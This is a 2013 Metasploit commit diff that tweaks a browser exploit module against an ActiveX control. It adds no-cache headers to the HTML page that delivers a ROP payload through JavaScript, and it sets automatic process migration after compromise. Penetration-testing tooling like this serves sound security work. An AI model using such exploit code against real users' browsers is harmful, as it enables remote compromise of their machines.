Fix usage of Retries

bug/bundler_fix
jvazquez-r7 2013-11-18 09:09:20 -06:00
parent 237bb22771
commit bddb314073
1 changed files with 11 additions and 1 deletions

View File

@ -75,6 +75,11 @@ class Metasploit3 < Msf::Exploit::Remote
}
]
],
'DefaultOptions' =>
{
'InitialAutoRunScript' => 'migrate -f',
'Retries' => false
},
'Privileged' => false,
'DisclosureDate' => "Nov 08 2013",
'DefaultTarget' => 0))
@ -104,7 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
js_payload = Rex::Text.to_unescape(rop_payload)
html_template = %Q|
<html><body>
<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
</head>
<body>
<object classid='clsid:19916E01-B44E-4E31-94A4-4696DF46157B' id='<%=symbols["CardSpaceSigninHelper"]%>'></object>
<script language='JavaScript'>